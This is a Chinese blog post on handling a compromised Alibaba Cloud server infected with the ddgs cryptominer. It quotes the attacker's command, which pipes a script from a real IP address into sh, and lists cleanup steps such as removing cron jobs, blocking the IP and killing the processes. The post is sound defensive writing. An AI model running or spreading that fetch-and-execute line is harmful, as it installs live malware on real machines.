这几天服务器一直发生异常行为,阿里云报警如下:

根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件

访问这个地址:http://165.225.157.157:8000/i.sh

看到执行语句如下:

大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定时任务crontab,还生成了ddgs.3010文件不断后台执行。

So,第一步,查看crontab -l ,果然有

那么显而易见,执行:crontab -r 删除掉cron任务。

第二步,安装firewall,具体操作,参考我的另外一篇博客:https://blog.csdn.net/u012259256/article/details/61018892

限制固定的访问端口:

第三步,其实阿里云后台提供了安全组策略,可以完成防火墙的功能,而且更加方便配置,配置如下(并且把165.225.157.157加入黑名单,不允许访问):

第四步,kill掉这些恶毒的进程,MD

用top命令,实时查看进程占用情况

(PS:因为进程已经被我kill掉,所以看不到数据啦)

没有kill之前,有一个恶意进程CPU占用198%,还有ddgs.3010进程,一直后台运行。总之,找到PID,然后kill就可以!

---------------------------------------------

总结:买了服务器一定记得先安装防火墙,或者设置安全策略!

Yeager

记一次阿里云黑客攻击事件相关推荐

  1. 记一次阿里云linux服务器中毒处理

    记一次阿里云linux服务器中毒处理 事件 定位进程 人肉筛查 clamav 来源 参考 事件 阿里云告警: 您的云服务器(XXXXX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(XXX)的 ...

  2. 记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(一摸一样,只是没查到怎么进来的,入侵)

    centos 7 记一次阿里云服务器被被种挖矿程序解决的过程 1.原因 偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下 2.查看进程 1 [root@izwz94xp1kwkca ...

  3. 尤金·卡巴斯基:卡巴斯基实验室调查内网遭黑客攻击事件

    猫宁!!! 尤金·卡巴斯基介绍: 尤金·卡巴斯基出生于黑海沿岸的新罗西斯克,父亲担任工程师,母亲是书库管理员.母亲常买许多数学杂志供其阅读.他在16岁就跳级进入密码.电信与计算机科学学院就读,从198 ...

  4. 记录一次阿里云服务器被攻击事件

    收到阿里云的攻击提示消息 直接导致的问题 服务器不能访问外网(准确的说是不能访问外网的80端口,例如:curl www.baidu.com,就获取不到任何信息.但是 curl https://www. ...

  5. EOS Dapps已成黑客攻击事件

    导读:本文盘点了近期EOS Dapps上影响较大的安全事件以及漏洞解读,同时以开发者的角度对EOS生态和"Code is Law"进行点评,严格执行Code is law,会增加用 ...

  6. 记一次阿里云k8s部署-测试存储

    记一次阿里云k8s部署 阿里云资源准备 服务器 ip 角色 资源 192.168.1.160 master1 2核4G 192.168.1.161 master2 2核4G 192.168.1.162 ...

  7. 4月17日黑客攻击事件简讯

    4月17日黑客攻击事件简讯 内蒙古赤峰林西委组织部 - www.lxxdj.gov.cn 快照:http://www.hack-cn.com/view/41443 甘肃崇信公安局 - www.cxga ...

  8. 外媒评选过去25年10大黑客攻击事件

    据国外媒体报道,美国新闻网站The Daily Beast日前评选出了过去25年中10大最具破坏性的黑客攻击事件.上周由一群匿名黑客进行的无休止的网络攻击,为众多政府和企业的网络管理员带来了恐慌.上周 ...

  9. 史上最大规模黑客攻击事件曝光,数百万人的个人信息遭到泄露

    最近一次史无前例的黑客攻击事件,令全球亿万人的个人信息遭到泄露.据报道,黑客组织 "暗影卫士" 攻击了全球最大的云计算服务提供商之一,窃取了该公司几百万用户的个人信息,包括姓名.电 ...

最新文章

  1. MySQL百万级、千万级数据多表关联SQL语句调优
  2. 硬核!一文梳理经典图网络模型
  3. win32 创建进程三种方式简单示例 - 使用CFree
  4. mysql中有主键和外键吗_谈谈mysql的主键和外键
  5. VS2010设置全局Include和Lib目录
  6. .NET Core 3.0 可卸载程序集原理简析
  7. JavaScript 学习随记——==和===及常见元素的真假值
  8. Hadoop学习笔记
  9. alwayson 增加节点_用于AlwaysON高可用性的域控制器和域客户端节点设置
  10. php 日期转毫秒_高性能的PHP日志系统 SeasLog 使用
  11. Python 微信自动发送消息
  12. IBM GPFS并行文件系统
  13. 视觉尺寸测量设备系统
  14. Java多用户商城系统B2B2C源码-(九)服务链路追踪(Spring Cloud Sleuth)
  15. mysql高性能学习笔记03_【MySQL】《高性能MySQL》 学习笔记,第三章,服务器性能剖析...
  16. vivo怎么切换为Android,vivox60pro如何切换系统 一键切换手机不通系统方法
  17. python 图片数据集批量打标签
  18. 复旦大学2015--2016学年第二学期高等代数II期末考试情况分析
  19. Import Netscaler VPX10.5 to Hyper-V 2012R2
  20. 网站访问量等数据统计

热门文章

  1. Matlab:连续按键、移动鼠标、鼠标点击、鼠标连点、输入字符,10行代码即可。
  2. Resetting first dirty offset of __consumer_offsets
  3. 【Java进阶营】Java是什么?Java的特点有哪些?
  4. 【计算机毕业设计】133在线课程管理系统
  5. 修正逆解文章——六轴UR机械臂正逆运动学求解_MATLAB代码(标准DH参数表)
  6. Mac:TexStudio 中文论文模版
  7. 研究生必备快速查找翻译阅读外文文献方法
  8. kmcuda: GPU加速 Kmeans
  9. Oracle 19c 安装步骤(超详细)
  10. 服务器最高安全防御策略选择与差异